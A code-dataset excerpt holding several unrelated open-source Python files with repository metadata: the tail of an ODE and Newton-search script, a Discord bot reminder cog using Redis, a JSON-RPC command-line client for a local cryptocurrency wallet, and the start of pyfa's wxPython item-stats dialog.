xs[i + 1] = xs[i] + (derivs[1] * dt)
ys[i + 1] = ys[i] + (derivs[2] * dt)
zs[i + 1] = zs[i] + (derivs[3] * dt)
return [ ws[-1], xs[-1], ys[-1], zs[-1] ]
def g(x_0, lmbda, T = 1):
"""objective function"""
return quad_sq_distance( f(x_0, lmbda, T), f(x_0, lmbda, 0) )
def g_T(x_0):
"""g instantiated with a fixed period"""
return g(x_0, lmbda, T)
def newton_search(x_0, T = 1, N = 25):
x = x_0
hessian = nd.core.Hessian(g_T)
jacobian = nd.core.Jacobian(g_T)
for i in range(N):
adjust = np.matmul(np.linalg.inv(hessian(x)), np.transpose( jacobian(x)))
adjust = np.transpose(adjust)[0]
#print(x)
#print(adjust)
x = list_subtract(x, adjust)
print(g_T(x))
print(x)
def plot_sim_path(x_0, T):
stepCnt = math.ceil(T / dt)
# Need one more for the initial values
ws = np.empty((stepCnt + 1,))
xs = np.empty((stepCnt + 1,))
ys = np.empty((stepCnt + 1,))
zs = np.empty((stepCnt + 1,))
# Setting initial values
x_1 = x_0[0]
y_1 = x_0[1]
x_2 = x_0[2]
y_2 = x_0[3]
ws[0], xs[0], ys[0], zs[0] = x_1, y_1, x_2, y_2
# Stepping through "time".
for i in range(stepCnt):
# Derivatives of the W, X, Y, Z state
derivs = dots([ ws[i], xs[i], ys[i], zs[i] ], lmbda )
ws[i + 1] = ws[i] + (derivs[0] * dt)
xs[i + 1] = xs[i] + (derivs[1] * dt)
ys[i + 1] = ys[i] + (derivs[2] * dt)
zs[i + 1] = zs[i] + (derivs[3] * dt)
plot_quad(ws, xs, ys, zs, 0)
if expmt == 'search':
newton_search(start_pt)
if expmt == 'plot':
plot_sim_path(x_0, T)
experiment_1((10.2,
9.3,
14.4,
12.2) , expmt = 'plot')
experiment_1((4.2, 3.3, 4.4, 2.2),
T = 10000,
lmbda = [0.086, 0.141, 0.773],
expmt = 'plot')
experiment_1((4.2, 3.3, 4.4, 2.2),
T = 1000,
lmbda = [0.086, 0.141, 0.773],
expmt = 'search')
|
mit
| 6,692,264,478,511,544,000
| 26.757848
| 92
| 0.47609
| false
| 2.722076
| false
| false
| false
|
Maverun/Nurevam
|
Bot/cogs/remind.py
|
1
|
14685
|
from datetime import datetime, timedelta
from discord.ext import commands
from .utils import utils
import traceback
import asyncio
import discord
import pytz
loop_list = {}
class Remind(commands.Cog): #This is to remind user about task they set.
def __init__(self,bot):
self.bot = bot
self.redis = bot.db.redis
self.loop = asyncio.get_event_loop()
self.loop_reminder_timer = self.loop.create_task(self.timer())
def cog_unload(self):
self.loop_reminder_timer.cancel()
for val in loop_list.values():
val.cancel()
utils.prPurple("unload remindme task")
async def clear(self,gid,uid,mid):
lp = loop_list.pop(mid,None) #pop out of list. Cast int just in case
if lp is not None:
lp.cancel() #just in case it was running and someone CANCEL IT
await self.redis.lrem(f"{gid}:Remindme:Person:{uid}",1,mid)
await self.redis.hdel(f"{gid}:Remindme:member",mid)
await self.redis.hdel(f"{gid}:Remindme:data", mid)
await self.redis.hdel(f"{gid}:Remindme:channel", mid)
await self.redis.hdel(f"{gid}:Remindme:time", mid)
async def timer(self): #Checking if there is remindme task that bot lost during shutdown/restart (losing data from memory)
await asyncio.sleep(5)#give it a moment..
utils.prYellow("Remindme Timer start")
guild_list = list(self.bot.guilds)
for guild in guild_list: #checking each guild
get_time = datetime.now().timestamp()
utils.prLightPurple(f"Checking {guild.name}")
data = await self.redis.hgetall(f"{guild.id}:Remindme:data")
if data: #if there is exist data then get info about info about channel
author_list = await self.redis.hgetall(f"{guild.id}:Remindme:member")
channel = await self.redis.hgetall(f"{guild.id}:Remindme:channel")
time = await self.redis.hgetall(f"{guild.id}:Remindme:time")
for mid in data: #run every Id in data and return timer
try:
if author_list.get(mid): #to be compaitable with old legacy.
check_str = f"{guild.id}:Remindme:Person:{author_list.get(mid)}"
if mid not in await self.redis.lrange(check_str,0,-1):
utils.prRed("RM:No longer in Person, so delete....")
await self.clear(guild.id,author_list.get(mid),mid)
continue #Somehow if it cant delete old one we might do it here.
chan = guild.get_channel(int(channel[mid]))
author = guild.get_member(int(author_list[mid]))
#Once Legacy will be gone, there might be some leftover
#such as one that was set really long.. that last years...
#those will be likely to be delete.
remain_time = int(time[mid]) - int(get_time)
utils.prYellow(f"Time: {remain_time},Channel: {channel[mid]}, Message: {data[mid]}")
if remain_time <= 0:
if chan:
await chan.send(f"{author.mention}\nI am deeply"
" sorry for not reminding you earlier!"
" You were reminded of the following:\n"
f"```fix\n {data[mid]} \n```")
await self.clear(guild.id,author.id,mid)
else:
if author_list.get(mid):
task = self.loop.create_task(self.time_send(
chan,author,data[mid],
remain_time,guild.id,mid))
else: #Old legacy... Soon to be delete once confirm
task = self.loop.create_task(self.old_time_send(
channel[mid],data[mid],
remain_time,guild.id,mid))
loop_list[mid] = task
except:
utils.prRed(traceback.format_exc())
async def time_send(self,channel,author,msg,time,guild,mid):
await asyncio.sleep(time)
#if it not in list, then dont send it as it is likely cancel.
if channel and loop_list.get(mid): #Making sure it not in list...
await self.send_msg(channel,author,msg)
await self.clear(guild,author.id,mid)
async def old_time_send(self,channel,msg,time,guild,x): #Legacy. Will delete
await asyncio.sleep(time)
channel = self.bot.get_channel(int(channel))
if channel:
await channel.send(msg)
await self.redis.hdel("{}:Remindme:data".format(guild), x)
await self.redis.hdel("{}:Remindme:channel".format(guild), x)
await self.redis.hdel("{}:Remindme:time".format(guild), x)
async def send_msg(self,ctx,author,msg):
await ctx.send(f"{author.mention} Reminder:\n```fix\n{msg}\n```")
@commands.command(hidden = True)
async def setTimezoneRemind(self,ctx,timez):
try:
#so we are checking if this timezone exists,
#if no error, we are clear.
#I will make this command more sense or pretty
#when I get a chance to rewrite them.... #TODO
if timez.lower() == "none":
await self.redis.delete("Profile:{}:Remind_Timezone".format(ctx.author.id))
return await ctx.send("I have removed timezone in your profile!")
tz = pytz.timezone(timez)
await self.redis.set("Profile:{}:Remind_Timezone".format(ctx.author.id),tz.zone)
return await ctx.send("Timezone set for your remind only!",delete_after = 30)
except pytz.UnknownTimeZoneError:
await ctx.send("There is no such a timezone, please check a list from there <https://en.wikipedia.org/wiki/List_of_tz_database_time_zones> under **TZ database Name**",delete_after = 30)
@commands.command(hidden = True)
@commands.has_permissions(manage_guild = True)
async def setServerTimezoneRemind(self,ctx,timez):
try:
#Similar as setTimezoneRemind ^^^
if timez.lower() == "none":
await self.redis.delete("{}:Remindme:zone".format(ctx.guild.id))
return await ctx.send("I have removed timezone in the server overall!")
tz = pytz.timezone(timez)
await self.redis.set(f"{ctx.guild.id}:Remindme:zone",tz.zone)
return await ctx.send("Timezone set for your server!",delete_after = 30)
except pytz.UnknownTimeZoneError:
await ctx.send("There is no such a timezone, please check a list from there <https://en.wikipedia.org/wiki/List_of_tz_database_time_zones> under **TZ database Name**",delete_after = 30)
async def split_time(self,ctx,t):
t = t.replace(".",":")
t = t.split(":")
if all(x.isdigit() for x in t) is False:
await self.bot.say(ctx,content = "You enter the format wrong! It should be look like this {}remindtime hh:mm:ss message".format(ctx.prefix))
return None
return [int(x) for x in t] #Returning them but first make sure its int!
@commands.command(hidden=True,pass_context=True,aliases=["rt"])
async def remindtime(self,ctx,get_time,*,message=""):
#Split them and check if they are valid.
time = await self.split_time(ctx, get_time)
if time is None: return
if len(time) == 1:
time.append(0)
time.append(0)
elif len(time) == 2:
time.append(0)
if 0 > time[0] or time[0] > 23 or 0 > time[1] or time[1] > 59 or 0 > time[2] or time[2] > 59:
return await self.bot.say(ctx,content = "You enter the number out of range than they should!")
#we are grabbing timezone from user set, if user didnt set,
#it will return None, and when we create timezone,
#it will auto select UTC format.
tz = await self.redis.get(f"Profile:{ctx.author.id}:Remind_Timezone")
if tz is None:
tz = await self.redis.get(f"{ctx.guild.id}:Remindme:zone")
timez = pytz.timezone(tz or "UTC") #if none, then UTC default.
time_set = datetime.now(timez).replace(hour = time[0],
minute = time[1],
second = time[2])
time_now = datetime.now(timez)
delta_time = time_set - time_now
if time_set < time_now:
delta_time += timedelta(days=1)
utils.prGreen(ctx)
await self.remindme_base(ctx,
str(timedelta(seconds=int(delta_time.total_seconds())))
,message=message)
@commands.command(hidden=True,pass_context=True,aliases=["rm"])
async def remindme(self,ctx,get_time,*,message=""):
await self.remindme_base(ctx,get_time,message=message)
async def remindme_base(self,ctx,get_time,*,message=""):
#Split them and check if they are valid.
time = await self.split_time(ctx,get_time)
if time is None: return
remind_time = 0
msg = "Time set "
if len(time) == 3:
remind_time += time[0]*3600 + time[1]*60 + time[2]
msg += "{} hours {} minute {} second".format(time[0],time[1],time[2])
elif len(time) == 2:
remind_time += time[0]*60 + time[1]
msg += "{} minute {} second".format(time[0],time[1])
else:
remind_time += time[0]
msg += "{} second".format(time[0])
if not message: message = "unspecified reminder"
rid = None
if remind_time >= 60:
#if it more than 1 min, then add id so it can remind you in cases
#bot goes down...
time = datetime.now().timestamp() + remind_time
#making ID of Message, User/Member, Guild
print(ctx)
mid = ctx.message.id
uid = ctx.author.id
gid = ctx.guild.id
cid = ctx.channel.id
#we will be using idea as LINK-LIST where we will push msg ID to tail
#This allow to keep as in order for ID so we can cancel when need
rid = await self.redis.rpush(f"{gid}:Remindme:Person:{uid}",mid)
#Setting MSGID to UserID, so we can find who responsiblity for this
await self.redis.hset(f"{gid}:Remindme:member",mid,uid)
await self.redis.hset(f"{gid}:Remindme:data",mid,message)
await self.redis.hset(f"{gid}:Remindme:channel",mid,cid)
await self.redis.hset(f"{gid}:Remindme:time",mid,int(time))
msg = f"{msg}\nID: {rid}" if rid else msg
await ctx.send(msg,delete_after=30)
task = self.loop.create_task( self.time_send(ctx.channel, ctx.author,
message, remind_time,
ctx.guild.id, str(ctx.message.id)))
loop_list[str(ctx.message.id)] = task
@commands.command(aliases = ["rl"], hidden = True)
async def remindlist(self, ctx ):
#There we will show a list of user's ID reminder.
uid = ctx.author.id
gid = ctx.guild.id
current_time = datetime.now().timestamp()
id_list = await self.redis.lrange(f"{gid}:Remindme:Person:{uid}",0,-1)
data_list = await self.redis.hgetall(f"{gid}:Remindme:data")
time_list = await self.redis.hgetall(f"{gid}:Remindme:time")
if not any(id_list): return await ctx.send("You haven't set any reminder!")
id_col = time_col = msg_col = ""
for i, rid in enumerate(id_list,start = 1):
old_time = time_list.get(rid,None)
if old_time is None: continue #TODO TEMP FIX
remain_time = int(old_time) - current_time
hold = [-1,-1,-1]
if remain_time >= 3600:
hold[0] = remain_time/3600 #hours
remain_time %= 3600 #get remiander min
if remain_time >= 60: #if min leftover
hold[1] = remain_time/60 #min
remain_time %= 60 #get remainder second
hold[2] = remain_time
ft = ["h","m","s"]
#we will then convert them to time message (5H,2M) etc.
#Cast int to cut off decimal
rtmsg = " ".join(f"{int(hold[i])}{ft[i]}" for i in range(3) if hold[i] != -1 )
#now we will set message, with 30 char of "data" to remind user
msg = data_list[rid]
id_col += f"{i}\n"
time_col += f"{rtmsg}\n"
msg_col += f"{msg[:30]}"
msg_col += "...\n" if len(msg) > 30 else "\n"
#set up embeds and add each to each field then send
e = discord.Embed()
e.add_field(name = "ID",value = id_col)
e.add_field(name = "Time Remain",value = time_col)
e.add_field(name = "Message",value = msg_col)
await ctx.send(embed = e)
@commands.command(aliases = ["rc"], hidden = True)
async def remindcancel(self, ctx, raw_rid:commands.Greedy[int],
is_all:str=""):
#We will just assume user know what they are doing lol
gid = ctx.guild.id
uid = ctx.author.id
if is_all == "all":
raw_len = await self.redis.llen(f"{gid}:Remindme:Person:{uid}")
raw_rid = [x for x in range(raw_len)]
if len(raw_rid) == 0:
return await ctx.send("You need to enter IDs (or \"all\")!")
raw_rid = sorted(raw_rid, reverse = True) #Sorting and in reverse
#Just in case user enter 1 3 then realized need to include 2.
for ri in raw_rid:
#First we will get what element it is at. Index start at 0 duh.
rid = await self.redis.lindex(f"{gid}:Remindme:Person:{uid}",ri-1)
#if we get none, out of range!
if rid is None:
return await ctx.send("Out of range!", delete_after = 30)
#Since we are here, then that mean it is inside, and we will just pop it
await self.clear(gid,uid,rid) #Clear up from DB
await ctx.send("Done.\nNote: Any ID after you enter will go down by 1")
def setup(bot):
bot.add_cog(Remind(bot))
|
mit
| 6,257,882,285,061,678,000
| 49.463918
| 197
| 0.55383
| false
| 3.744263
| false
| false
| false
|
crypticmac/McGregor
|
contrib/bitrpc/bitrpc.py
|
1
|
9665
|
from jsonrpc import ServiceProxy
import sys
import string
import getpass
# ===== BEGIN USER SETTINGS =====
# if you do not set these you will be prompted for a password for every command
rpcuser = ""
rpcpass = ""
# ====== END USER SETTINGS ======
if rpcpass == "":
access = ServiceProxy("http://127.0.0.1:9332")
else:
access = ServiceProxy("http://"+rpcuser+":"+rpcpass+"@127.0.0.1:9332")
cmd = sys.argv[1].lower()
if cmd == "backupwallet":
try:
path = raw_input("Enter destination path/filename: ")
print access.backupwallet(path)
except:
print "\n---An error occurred---\n"
elif cmd == "encryptwallet":
try:
pwd = getpass.getpass(prompt="Enter passphrase: ")
pwd2 = getpass.getpass(prompt="Repeat passphrase: ")
if pwd == pwd2:
access.encryptwallet(pwd)
print "\n---Wallet encrypted. Server stopping, restart to run with encrypted wallet---\n"
else:
print "\n---Passphrases do not match---\n"
except:
print "\n---An error occurred---\n"
elif cmd == "getaccount":
try:
addr = raw_input("Enter a McGregor address: ")
print access.getaccount(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "getaccountaddress":
try:
acct = raw_input("Enter an account name: ")
print access.getaccountaddress(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getaddressesbyaccount":
try:
acct = raw_input("Enter an account name: ")
print access.getaddressesbyaccount(acct)
except:
print "\n---An error occurred---\n"
elif cmd == "getbalance":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getbalance(acct, mc)
except:
print access.getbalance()
except:
print "\n---An error occurred---\n"
elif cmd == "getblockbycount":
try:
height = raw_input("Height: ")
print access.getblockbycount(height)
except:
print "\n---An error occurred---\n"
elif cmd == "getblockcount":
try:
print access.getblockcount()
except:
print "\n---An error occurred---\n"
elif cmd == "getblocknumber":
try:
print access.getblocknumber()
except:
print "\n---An error occurred---\n"
elif cmd == "getconnectioncount":
try:
print access.getconnectioncount()
except:
print "\n---An error occurred---\n"
elif cmd == "getdifficulty":
try:
print access.getdifficulty()
except:
print "\n---An error occurred---\n"
elif cmd == "getgenerate":
try:
print access.getgenerate()
except:
print "\n---An error occurred---\n"
elif cmd == "gethashespersec":
try:
print access.gethashespersec()
except:
print "\n---An error occurred---\n"
elif cmd == "getinfo":
try:
print access.getinfo()
except:
print "\n---An error occurred---\n"
elif cmd == "getnewaddress":
try:
acct = raw_input("Enter an account name: ")
try:
print access.getnewaddress(acct)
except:
print access.getnewaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaccount":
try:
acct = raw_input("Enter an account (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaccount(acct, mc)
except:
print access.getreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "getreceivedbyaddress":
try:
addr = raw_input("Enter a McGregor address (optional): ")
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.getreceivedbyaddress(addr, mc)
except:
print access.getreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "gettransaction":
try:
txid = raw_input("Enter a transaction ID: ")
print access.gettransaction(txid)
except:
print "\n---An error occurred---\n"
elif cmd == "getwork":
try:
data = raw_input("Data (optional): ")
try:
print access.gettransaction(data)
except:
print access.gettransaction()
except:
print "\n---An error occurred---\n"
elif cmd == "help":
try:
cmd = raw_input("Command (optional): ")
try:
print access.help(cmd)
except:
print access.help()
except:
print "\n---An error occurred---\n"
elif cmd == "listaccounts":
try:
mc = raw_input("Minimum confirmations (optional): ")
try:
print access.listaccounts(mc)
except:
print access.listaccounts()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaccount":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaccount(mc, incemp)
except:
print access.listreceivedbyaccount()
except:
print "\n---An error occurred---\n"
elif cmd == "listreceivedbyaddress":
try:
mc = raw_input("Minimum confirmations (optional): ")
incemp = raw_input("Include empty? (true/false, optional): ")
try:
print access.listreceivedbyaddress(mc, incemp)
except:
print access.listreceivedbyaddress()
except:
print "\n---An error occurred---\n"
elif cmd == "listtransactions":
try:
acct = raw_input("Account (optional): ")
count = raw_input("Number of transactions (optional): ")
frm = raw_input("Skip (optional):")
try:
print access.listtransactions(acct, count, frm)
except:
print access.listtransactions()
except:
print "\n---An error occurred---\n"
elif cmd == "move":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.move(frm, to, amt, mc, comment)
except:
print access.move(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendfrom":
try:
frm = raw_input("From: ")
to = raw_input("To: ")
amt = raw_input("Amount:")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendfrom(frm, to, amt, mc, comment, commentto)
except:
print access.sendfrom(frm, to, amt)
except:
print "\n---An error occurred---\n"
elif cmd == "sendmany":
try:
frm = raw_input("From: ")
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
mc = raw_input("Minimum confirmations (optional): ")
comment = raw_input("Comment (optional): ")
try:
print access.sendmany(frm,to,mc,comment)
except:
print access.sendmany(frm,to)
except:
print "\n---An error occurred---\n"
elif cmd == "sendtoaddress":
try:
to = raw_input("To (in format address1:amount1,address2:amount2,...): ")
amt = raw_input("Amount:")
comment = raw_input("Comment (optional): ")
commentto = raw_input("Comment-to (optional): ")
try:
print access.sendtoaddress(to,amt,comment,commentto)
except:
print access.sendtoaddress(to,amt)
except:
print "\n---An error occurred---\n"
elif cmd == "setaccount":
try:
addr = raw_input("Address: ")
acct = raw_input("Account:")
print access.setaccount(addr,acct)
except:
print "\n---An error occurred---\n"
elif cmd == "setgenerate":
try:
gen= raw_input("Generate? (true/false): ")
cpus = raw_input("Max processors/cores (-1 for unlimited, optional):")
try:
print access.setgenerate(gen, cpus)
except:
print access.setgenerate(gen)
except:
print "\n---An error occurred---\n"
elif cmd == "settxfee":
try:
amt = raw_input("Amount:")
print access.settxfee(amt)
except:
print "\n---An error occurred---\n"
elif cmd == "stop":
try:
print access.stop()
except:
print "\n---An error occurred---\n"
elif cmd == "validateaddress":
try:
addr = raw_input("Address: ")
print access.validateaddress(addr)
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrase":
try:
pwd = getpass.getpass(prompt="Enter wallet passphrase: ")
access.walletpassphrase(pwd, 60)
print "\n---Wallet unlocked---\n"
except:
print "\n---An error occurred---\n"
elif cmd == "walletpassphrasechange":
try:
pwd = getpass.getpass(prompt="Enter old wallet passphrase: ")
pwd2 = getpass.getpass(prompt="Enter new wallet passphrase: ")
access.walletpassphrasechange(pwd, pwd2)
print
print "\n---Passphrase changed---\n"
except:
print
print "\n---An error occurred---\n"
print
else:
print "Command not found or not supported"
|
mit
| -8,488,040,174,819,469,000
| 27.679525
| 101
| 0.568546
| false
| 3.944898
| false
| false
| false
|
Ebag333/Pyfa
|
gui/itemStats.py
|
1
|
50776
|
# =============================================================================
# Copyright (C) 2010 Diego Duclos
#
# This file is part of pyfa.
#
# pyfa is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# pyfa is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with pyfa. If not, see <http://www.gnu.org/licenses/>.
# =============================================================================
import re
import os
import csv
import sys
import subprocess
import wx
import wx.html
import wx.lib.mixins.listctrl as listmix
import config
from eos.types import Fit, Ship, Citadel, Module, Skill, Booster, Implant, Drone, Mode, Fighter
from service.market import Market
from service.attribute import Attribute
import gui.mainFrame
from gui.bitmapLoader import BitmapLoader
from gui.utils.numberFormatter import formatAmount
from gui.contextMenu import ContextMenu
class ItemStatsDialog(wx.Dialog):
counter = 0
def __init__(
self,
victim,
fullContext=None,
pos=wx.DefaultPosition,
size=wx.DefaultSize,
maximized=False
):
wx.Dialog.__init__(
self,
gui.mainFrame.MainFrame.getInstance(),
wx.ID_ANY,
title="Item stats",
pos=pos,
size=size,
style=wx.CAPTION | wx.CLOSE_BOX | wx.MINIMIZE_BOX | wx.MAXIMIZE_BOX | wx.RESIZE_BORDER | wx.SYSTEM_MENU
)
empty = getattr(victim, "isEmpty", False)
if empty:
self.Hide()
self.Destroy()
return
srcContext = fullContext[0]
try:
itmContext = fullContext[1]
except IndexError:
itmContext = None
item = getattr(victim, "item", None) if srcContext.lower() not in (
"projectedcharge",
"fittingcharge"
) else getattr(victim, "charge", None)
if item is None:
sMkt = Market.getInstance()
item = sMkt.getItem(victim.ID)
victim = None
self.context = itmContext
if item.icon is not None:
before, sep, after = item.icon.iconFile.rpartition("_")
iconFile = "%s%s%s" % (before, sep, "0%s" % after if len(after) < 2 else after)
itemImg = BitmapLoader.getBitmap(iconFile, "icons")
if itemImg is not None:
self.SetIcon(wx.IconFromBitmap(itemImg))
self.SetTitle("%s: %s%s" % ("%s Stats" % itmContext if itmContext is not None else "Stats", item.name,
" (%d)" % item.ID if config.debug else ""))
self.SetMinSize((300, 200))
if "wxGTK" in wx.PlatformInfo: # GTK has huge tab widgets, give it a bit more room
self.SetSize((580, 500))
else:
self.SetSize((550, 500))
# self.SetMaxSize((500, -1))
self.mainSizer = wx.BoxSizer(wx.VERTICAL)
self.container = ItemStatsContainer(self, victim, item, itmContext)
self.mainSizer.Add(self.container, 1, wx.EXPAND)
if "wxGTK" in wx.PlatformInfo:
self.closeBtn = wx.Button(self, wx.ID_ANY, u"Close", wx.DefaultPosition, wx.DefaultSize, 0)
self.mainSizer.Add(self.closeBtn, 0, wx.ALL | wx.ALIGN_RIGHT, 5)
self.closeBtn.Bind(wx.EVT_BUTTON, self.closeEvent)
self.SetSizer(self.mainSizer)
self.parentWnd = gui.mainFrame.MainFrame.getInstance()
dlgsize = self.GetSize()
psize = self.parentWnd.GetSize()
ppos = self.parentWnd.GetPosition()
ItemStatsDialog.counter += 1
self.dlgOrder = ItemStatsDialog.counter
counter = ItemStatsDialog.counter
dlgStep = 30
if counter * dlgStep > ppos.x + psize.width - dlgsize.x or counter * dlgStep > ppos.y + psize.height - dlgsize.y:
ItemStatsDialog.counter = 1
dlgx = ppos.x + counter * dlgStep
dlgy = ppos.y + counter * dlgStep
if pos == wx.DefaultPosition:
self.SetPosition((dlgx, dlgy))
else:
self.SetPosition(pos)
if maximized:
self.Maximize(True)
else:
if size != wx.DefaultSize:
self.SetSize(size)
self.parentWnd.RegisterStatsWindow(self)
self.Show()
self.Bind(wx.EVT_CLOSE, self.closeEvent)
self.Bind(wx.EVT_ACTIVATE, self.OnActivate)
def OnActivate(self, event):
self.parentWnd.SetActiveStatsWindow(self)
def closeEvent(self, event):
if self.dlgOrder == ItemStatsDialog.counter:
ItemStatsDialog.counter -= 1
self.parentWnd.UnregisterStatsWindow(self)
self.Destroy()
class ItemStatsContainer(wx.Panel):
def __init__(self, parent, stuff, item, context=None):
wx.Panel.__init__(self, parent)
sMkt = Market.getInstance()
mainSizer = wx.BoxSizer(wx.VERTICAL)
self.nbContainer = wx.Notebook(self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, 0)
mainSizer.Add(self.nbContainer, 1, wx.EXPAND | wx.ALL, 2)
if item.traits is not None:
self.traits = ItemTraits(self.nbContainer, stuff, item)
self.nbContainer.AddPage(self.traits, "Traits")
self.desc = ItemDescription(self.nbContainer, stuff, item)
self.nbContainer.AddPage(self.desc, "Description")
self.params = ItemParams(self.nbContainer, stuff, item, context)
self.nbContainer.AddPage(self.params, "Attributes")
items = sMkt.getVariationsByItems([item])
if len(items) > 1:
self.compare = ItemCompare(self.nbContainer, stuff, item, items, context)
self.nbContainer.AddPage(self.compare, "Compare")
self.reqs = ItemRequirements(self.nbContainer, stuff, item)
self.nbContainer.AddPage(self.reqs, "Requirements")
self.effects = ItemEffects(self.nbContainer, stuff, item)
self.nbContainer.AddPage(self.effects, "Effects")
if stuff is not None:
self.affectedby = ItemAffectedBy(self.nbContainer, stuff, item)
self.nbContainer.AddPage(self.affectedby, "Affected by")
self.nbContainer.Bind(wx.EVT_LEFT_DOWN, self.mouseHit)
self.SetSizer(mainSizer)
self.Layout()
def __del__(self):
pass
def mouseHit(self, event):
tab, _ = self.nbContainer.HitTest(event.Position)
if tab != -1:
self.nbContainer.SetSelection(tab)
class AutoListCtrl(wx.ListCtrl, listmix.ListCtrlAutoWidthMixin, listmix.ListRowHighlighter):
def __init__(self, parent, ID, pos=wx.DefaultPosition, size=wx.DefaultSize, style=0):
wx.ListCtrl.__init__(self, parent, ID, pos, size, style)
listmix.ListCtrlAutoWidthMixin.__init__(self)
listmix.ListRowHighlighter.__init__(self)
class AutoListCtrlNoHighlight(wx.ListCtrl, listmix.ListCtrlAutoWidthMixin, listmix.ListRowHighlighter):
def __init__(self, parent, ID, pos=wx.DefaultPosition, size=wx.DefaultSize, style=0):
wx.ListCtrl.__init__(self, parent, ID, pos, size, style)
listmix.ListCtrlAutoWidthMixin.__init__(self)
class ItemTraits(wx.Panel):
def __init__(self, parent, stuff, item):
wx.Panel.__init__(self, parent)
mainSizer = wx.BoxSizer(wx.VERTICAL)
self.SetSizer(mainSizer)
self.traits = wx.html.HtmlWindow(self)
self.traits.SetPage(item.traits.traitText)
mainSizer.Add(self.traits, 1, wx.ALL | wx.EXPAND, 0)
self.Layout()
class ItemDescription(wx.Panel):
def __init__(self, parent, stuff, item):
wx.Panel.__init__(self, parent)
mainSizer = wx.BoxSizer(wx.VERTICAL)
self.SetSizer(mainSizer)
bgcolor = wx.SystemSettings_GetColour(wx.SYS_COLOUR_WINDOW)
fgcolor = wx.SystemSettings_GetColour(wx.SYS_COLOUR_WINDOWTEXT)
self.description = wx.html.HtmlWindow(self)
if not item.description:
return
desc = item.description.replace("\n", "<br>")
# Strip font tags
desc = re.sub("<( *)font( *)color( *)=(.*?)>(?P<inside>.*?)<( *)/( *)font( *)>", "\g<inside>", desc)
# Strip URLs
desc = re.sub("<( *)a(.*?)>(?P<inside>.*?)<( *)/( *)a( *)>", "\g<inside>", desc)
desc = "<body bgcolor='" + bgcolor.GetAsString(wx.C2S_HTML_SYNTAX) + "' text='" + fgcolor.GetAsString(
wx.C2S_HTML_SYNTAX) + "' >" + desc + "</body>"
self.description.SetPage(desc)
mainSizer.Add(self.description, 1, wx.ALL | wx.EXPAND, 0)
self.Layout()
class ItemParams(wx.Panel):
def __init__(self, parent, stuff, item, context=None):
wx.Panel.__init__(self, parent)
mainSizer = wx.BoxSizer(wx.VERTICAL)
self.paramList = AutoListCtrl(self, wx.ID_ANY,
style=wx.LC_REPORT | wx.LC_SINGLE_SEL | wx.LC_VRULES | wx.NO_BORDER)
mainSizer.Add(self.paramList, 1, wx.ALL | wx.EXPAND, 0)
self.SetSizer(mainSizer)
self.toggleView = 1
self.stuff = stuff
self.item = item
self.attrInfo = {}
self.attrValues = {}
self._fetchValues()
self.m_staticline = wx.StaticLine(self, wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize, wx.LI_HORIZONTAL)
mainSizer.Add(self.m_staticline, 0, wx.EXPAND)
bSizer = wx.BoxSizer(wx.HORIZONTAL)
self.totalAttrsLabel = wx.StaticText(self, wx.ID_ANY, u" ", wx.DefaultPosition, wx.DefaultSize, 0)
bSizer.Add(self.totalAttrsLabel, 0, wx.ALIGN_CENTER_VERTICAL | wx.RIGHT)
self.toggleViewBtn = wx.ToggleButton(self, wx.ID_ANY, u"Toggle view mode", wx.DefaultPosition, wx.DefaultSize,
0)
bSizer.Add(self.toggleViewBtn, 0, wx.ALIGN_CENTER_VERTICAL)
self.exportStatsBtn = wx.ToggleButton(self, wx.ID_ANY, u"Export Item Stats", wx.DefaultPosition, wx.DefaultSize,
0)
bSizer.Add(self.exportStatsBtn, 0, wx.ALIGN_CENTER_VERTICAL)
if stuff is not None:
self.refreshBtn = wx.Button(self, wx.ID_ANY, u"Refresh", wx.DefaultPosition, wx.DefaultSize, wx.BU_EXACTFIT)
bSizer.Add(self.refreshBtn, 0, wx.ALIGN_CENTER_VERTICAL)
self.refreshBtn.Bind(wx.EVT_BUTTON, self.RefreshValues)
mainSizer.Add(bSizer, 0, wx.ALIGN_RIGHT)
self.PopulateList()
self.toggleViewBtn.Bind(wx.EVT_TOGGLEBUTTON, self.ToggleViewMode)
self.exportStatsBtn.Bind(wx.EVT_TOGGLEBUTTON, self.ExportItemStats)
def _fetchValues(self):
if self.stuff is None:
self.attrInfo.clear()
self.attrValues.clear()
self.attrInfo.update(self.item.attributes)
self.attrValues.update(self.item.attributes)
elif self.stuff.item == self.item:
self.attrInfo.clear()
self.attrValues.clear()
self.attrInfo.update(self.stuff.item.attributes)
self.attrValues.update(self.stuff.itemModifiedAttributes)
elif self.stuff.charge == self.item:
self.attrInfo.clear()
self.attrValues.clear()
self.attrInfo.update(self.stuff.charge.attributes)
self.attrValues.update(self.stuff.chargeModifiedAttributes)
# When item for stats window no longer exists, don't change anything
else:
return
def UpdateList(self):
self.Freeze()
self.paramList.ClearAll()
self.PopulateList()
self.Thaw()
self.paramList.resizeLastColumn(100)
def RefreshValues(self, event):
self._fetchValues()
